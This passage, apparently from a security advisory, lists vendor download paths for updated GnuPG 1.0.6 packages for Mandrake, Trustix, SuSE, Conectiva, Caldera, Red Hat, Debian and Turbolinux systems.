Linux-Mandrake 7.2: 7.2/RPMS/gnupg-1.0.6-1.1mdk.i586.rpm
7.2/SRPMS/gnupg-1.0.6-1.1mdk.src.rpm
Linux-Mandrake 8.0: 8.0/RPMS/gnupg-1.0.6-1.1mdk.i586.rpm
8.0/SRPMS/gnupg-1.0.6-1.1mdk.src.rpm
Corporate Server 1.0.1: 1.0.1/RPMS/gnupg-1.0.6-1.2mdk.i586.rpm
1.0.1/SRPMS/gnupg-1.0.6-1.2mdk.src.rpm
For Trustix Secure Linux:
http://www.trustix.net/pub/Trustix/updates/
ftp://ftp.trustix.net/pub/Trustix/updates/
ftp://ftp.trustix.net/pub/Trustix/software/swup/
./1.2/SRPMS/gnupg-1.0.6-1tr.src.rpm
./1.2/RPMS/gnupg-1.0.6-1tr.i586.rpm
./1.1/SRPMS/gnupg-1.0.6-1tr.src.rpm
./1.1/RPMS/gnupg-1.0.6-1tr.i586.rpm
For SuSE Linux:
ftp://ftp.suse.com/pub/suse/i386/update/7.1/sec1/gpg-1.0.6-0.i386.rpm
ftp://ftp.suse.com/pub/suse/i386/update/7.1/zq1/gpg-1.0.6-0.src.rpm
ftp://ftp.suse.de/pub/suse/i386/update/7.0/sec1/gpg-1.0.6-0.i386.rpm
ftp://ftp.suse.de/pub/suse/i386/update/7.0/zq1/gpg-1.0.6-0.src.rpm
ftp://ftp.suse.de/pub/suse/i386/update/6.4/sec1/gpg-1.0.6-1.i386.rpm
ftp://ftp.suse.de/pub/suse/i386/update/6.4/zq1/gpg-1.0.6-1.src.rpm
ftp://ftp.suse.de/pub/suse/i386/update/6.3/sec1/gpg-1.0.6-1.i386.rpm
ftp://ftp.suse.de/pub/suse/i386/update/6.3/zq1/gpg-1.0.6-1.src.rpm
ftp://ftp.suse.com/pub/suse/sparc/update/7.1/sec1/gpg-1.0.6-0.sparc.rpm
ftp://ftp.suse.com/pub/suse/sparc/update/7.1/zq1/gpg-1.0.6-0.src.rpm
ftp://ftp.suse.de/pub/suse/sparc/update/7.0/sec1/gpg-1.0.6-0.sparc.rpm
ftp://ftp.suse.de/pub/suse/sparc/update/7.0/zq1/gpg-1.0.6-0.src.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.1/sec1/gpg-1.0.6-0.ppc.rpm
ftp://ftp.suse.com/pub/suse/ppc/update/7.1/zq1/gpg-1.0.6-0.src.rpm
ftp://ftp.suse.de/pub/suse/ppc/update/7.0/sec1/gpg-1.0.6-0.ppc.rpm
ftp://ftp.suse.de/pub/suse/ppc/update/7.0/zq1/gpg-1.0.6-0.src.rpm
ftp://ftp.suse.de/pub/suse/ppc/update/6.4/sec1/gpg-1.0.5-3.ppc.rpm
ftp://ftp.suse.de/pub/suse/ppc/update/6.4/zq1/gpg-1.0.5-3.src.rpm
ftp://ftp.suse.com/pub/suse/axp/update/7.1/sec1/gpg-1.0.6-0.alpha.rpm
ftp://ftp.suse.com/pub/suse/axp/update/7.1/zq1/gpg-1.0.6-0.src.rpm
ftp://ftp.suse.de/pub/suse/axp/update/7.0/sec1/gpg-1.0.6-0.alpha.rpm
ftp://ftp.suse.de/pub/suse/axp/update/7.0/zq1/gpg-1.0.6-0.src.rpm
ftp://ftp.suse.de/pub/suse/axp/update/6.4/sec1/gpg-1.0.6-1.alpha.rpm
ftp://ftp.suse.de/pub/suse/axp/update/6.4/zq1/gpg-1.0.6-1.src.rpm
ftp://ftp.suse.de/pub/suse/axp/update/6.3/sec1/gpg-1.0.6-2.alpha.rpm
ftp://ftp.suse.de/pub/suse/axp/update/6.3/zq1/gpg-1.0.6-2.src.rpm
For Conectiva Linux:
ftp://atualizacoes.conectiva.com.br/4.0/SRPMS/gnupg-1.0.6-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/gnupg-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0/i386/gnupg-doc-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es//SRPMS/gnupg-1.0.6-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/gnupg-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.0es/i386/gnupg-doc-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/SRPMS/gnupg-1.0.6-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/gnupg-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.1/i386/gnupg-doc-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/SRPMS/gnupg-1.0.6-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/gnupg-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/4.2/i386/gnupg-doc-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/SRPMS/gnupg-1.0.6-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/gnupg-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.0/i386/gnupg-doc-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/SRPMS/gnupg-1.0.6-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/gnupg-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/5.1/i386/gnupg-doc-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/gnupg-1.0.6-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/gnupg-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/6.0/RPMS/gnupg-doc-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/SRPMS/gnupg-1.0.6-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/gnupg-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/ecommerce/i386/gnupg-doc-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/SRPMS/gnupg-1.0.6-1cl.src.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/gnupg-1.0.6-1cl.i386.rpm
ftp://atualizacoes.conectiva.com.br/ferramentas/graficas/i386/gnupg-doc-1.0.6-1cl.i386.rpm
For Caldera Linux:
ftp://ftp.caldera.com/pub/updates/OpenLinux/2.3/current/RPMS/gnupg-1.0.6-1.i386.rpm
ftp://ftp.caldera.com/pub/updates/OpenLinux/2.3/current/SRPMS/gnupg-1.0.6-1.src.rpm
ftp://ftp.caldera.com/pub/updates/eServer/2.3/current/RPMS/gnupg-1.0.6-1.i386.rpm
ftp://ftp.caldera.com/pub/updates/eServer/2.3/current/SRPMS/gnupg-1.0.6-1.src.rpm
ftp://ftp.caldera.com/pub/updates/eDesktop/2.4/current/RPMS/gnupg-1.0.6-1.i386.rpm
ftp://ftp.caldera.com/pub/updates/eDesktop/2.4/current/SRPMS/gnupg-1.0.6-1.src.rpm
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/RPMS/gnupg-1.0.6-1.i386.rpm
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Server/current/SRPMS/gnupg-1.0.6-1.src.rpm
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/RPMS/gnupg-1.0.6-1.i386.rpm
ftp://ftp.caldera.com/pub/updates/OpenLinux/3.1/Workstation/current/SRPMS/gnupg-1.0.6-1.src.rpm
For RedHat:
ftp://updates.redhat.com/6.2/en/os/SRPMS/gnupg-1.0.6-0.6.x.src.rpm
ftp://updates.redhat.com/6.2/en/os/alpha/gnupg-1.0.6-0.6.x.alpha.rpm
ftp://updates.redhat.com/6.2/en/os/i386/gnupg-1.0.6-0.6.x.i386.rpm
ftp://updates.redhat.com/6.2/en/os/sparc/gnupg-1.0.6-0.6.x.sparc.rpm
ftp://updates.redhat.com/7.0/en/os/SRPMS/gnupg-1.0.6-1.src.rpm
ftp://updates.redhat.com/7.0/en/os/alpha/gnupg-1.0.6-1.alpha.rpm
ftp://updates.redhat.com/7.0/en/os/i386/gnupg-1.0.6-1.i386.rpm
ftp://updates.redhat.com/7.1/en/os/SRPMS/gnupg-1.0.6-1.src.rpm
ftp://updates.redhat.com/7.1/en/os/i386/gnupg-1.0.6-1.i386.rpm
For Debian:
http://security.debian.org/dists/stable/updates/main/source/gnupg_1.0.6-0potato1.diff.gz
http://security.debian.org/dists/stable/updates/main/source/gnupg_1.0.6-0potato1.dsc
http://security.debian.org/dists/stable/updates/main/source/gnupg_1.0.6.orig.tar.gz
http://security.debian.org/dists/stable/updates/main/binary-alpha/gnupg_1.0.6-0potato1_alpha.deb
http://security.debian.org/dists/stable/updates/main/binary-arm/gnupg_1.0.6-0potato1_arm.deb
http://security.debian.org/dists/stable/updates/main/binary-i386/gnupg_1.0.6-0potato1_i386.deb
http://security.debian.org/dists/stable/updates/main/binary-m68k/gnupg_1.0.6-0potato1_m68k.deb
http://security.debian.org/dists/stable/updates/main/binary-powerpc/gnupg_1.0.6-0potato1_powerpc.deb
http://security.debian.org/dists/stable/updates/main/binary-sparc/gnupg_1.0.6-0potato1_sparc.deb
For Turbolinux:
ftp://ftp.turbolinux.com/pub/updates/6.0/security/gnupg-1.0.6-1.i386.rpm
ftp://ftp.turbolinux.com/pub/updates/6.0/SRPMS/gnupg-1.0.6-1.src.rpm